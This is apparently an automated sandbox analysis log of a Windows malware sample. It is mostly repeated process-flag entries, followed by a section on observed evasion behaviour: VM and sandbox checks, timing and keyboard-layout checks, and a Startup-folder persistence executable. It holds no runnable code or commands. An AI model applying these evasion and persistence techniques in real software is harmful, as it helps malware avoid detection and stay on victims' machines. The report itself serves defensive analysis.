        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\1ZXaFij.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_2-84940
        Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
        Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
        Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
        Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
        Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\explorer.exeCode function: 23_2_11F92FC0 rdtscp 23_2_11F92FC0
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: SetTimer,GetTickCount,GetMessageW,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,GetFocus,GetClassNameW,GetTickCount,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,GetTickCount,PeekMessageW,Sleep,Sleep,GetTickCount,Sleep,GetClassLongW,GetWindowLongPtrW,GetWindowLongW,GetParent,TranslateAcceleratorW,GetDlgCtrlID,GetParent,GetKeyState,GetKeyState,GetDlgCtrlID,GetParent,SendMessageW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,PostMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetTickCount,KillTimer,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,KillTimer, 2_2_000000014000172D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3242
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6379
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4222
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1181
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2473
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1206
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2464
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 515
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vk4yczyv.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe API coverage: 2.6 %
        Source: C:\Users\user\Desktop\1ZXaFij.exe TID: 2440 Thread sleep time: -30000s >= -30000s
        Source: C:\Users\user\Desktop\1ZXaFij.exe TID: 7180 Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308 Thread sleep count: 3242 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308 Thread sleep count: 6379 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684 Thread sleep time: -16602069666338586s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe TID: 7412 Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516 Thread sleep count: 4222 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516 Thread sleep count: 1181 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692 Thread sleep time: -7378697629483816s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8028 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168 Thread sleep count: 2464 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172 Thread sleep count: 515 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1252 Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
        Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_000000014004913B GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400492E5h country: Urdu (ur) 2_2_000000014004913B
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_000000014004913B GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: jnbe 00000001400492E5h country: Inuktitut (iu) 2_2_000000014004913B
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_000000014001D8D0 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 000000014001DC40h country: Spanish (es) 2_2_000000014001D8D0
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_0000000140022EF0 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 00000001400230FCh country: Russian (ru) 2_2_0000000140022EF0
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_0000000140035270 GetLocalTime followed by cmp: cmp ax, 0009h and CTI: jne 0000000140035615h 2_2_0000000140035270
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_0000000140035270 GetLocalTime followed by cmp: cmp dx, ax and CTI: je 00000001400357D2h 2_2_0000000140035270
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_00000001400A24B0 FindFirstFileW,FindClose,FindFirstFileW,FindClose, 2_2_00000001400A24B0
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_00000001400296C0 GetFileAttributesW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 2_2_00000001400296C0
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_00000001400709C0 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose, 2_2_00000001400709C0
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_0000000140029170 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime, 2_2_0000000140029170
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_0000000140029520 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose, 2_2_0000000140029520
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_0000000140028E70 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 2_2_0000000140028E70
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe File opened: C:\Users\user\AppData\Roaming\
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe File opened: C:\Users\user\
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe File opened: C:\Users\user\AppData\
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A98B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bVMCiwzXsG
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A9005000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: QemUBE
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A9005000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: LhuFsbQEMuJy
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A9005000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IvckUpVvQEMupTahhY
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A7C05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmciQbuqHYlbstrNs
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A8605000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: HVvMcIwJ
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A98B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CYogXQEMUErDuxpV
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A98B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PDHGfScBbP
        Source: 1ZXaFij.exe, 00000002.00000003.1365261600.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000003.1364834877.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000003.1372869069.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000002.1375951384.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000002.1398945676.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397792204.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000002.1398553534.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397215330.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1398080911.0000000000A65000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: explorer.exe, 00000017.00000000.1511345993.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: r&_VMware_SATA_CD00#4&224f42ef&0&0
        Source: runps.exe, 0000000C.00000002.1398945676.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397215330.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1398080911.0000000000A65000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW)
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A8605000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Jvmcis
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A9005000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: deyWQXoXAPRlFsz
        Source: explorer.exe, 00000017.00000002.1664331014.0000000008F27000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWT`
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A8605000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: hgfsALVLGm
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A8605000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: yerbuZvmcISIqzYvt
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A8605000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEMUeoeSaiPCqZeyH
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A7C05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: fkvCnytFVMcIfHrGkc
        Source: 1ZXaFij.exe, 00000002.00000003.1373881049.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000002.1375884044.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000003.1364834877.0000000000A67000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A7C05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: nfUGXmHxjYwRhgFsa
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A9005000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: EEkhGFSe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
        Source: C:\Windows\explorer.exe Code function: 23_2_11F92FC0 rdtscp 23_2_11F92FC0
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_000000014001E05C GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetTickCount, 2_2_000000014001E05C
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_00000001400D5288 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00000001400D5288
        Source: C:\Users\user\Desktop\1ZXaFij.exe Code function: 2_2_00000001400250E0 GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,WideCharToMultiByte,GetProcAddress,GetProcAddress,WideCharToMultiByte,GetModuleHandleW,LoadLibraryW,GetProcAddress,GetProcAddress, 2_2_00000001400250E0
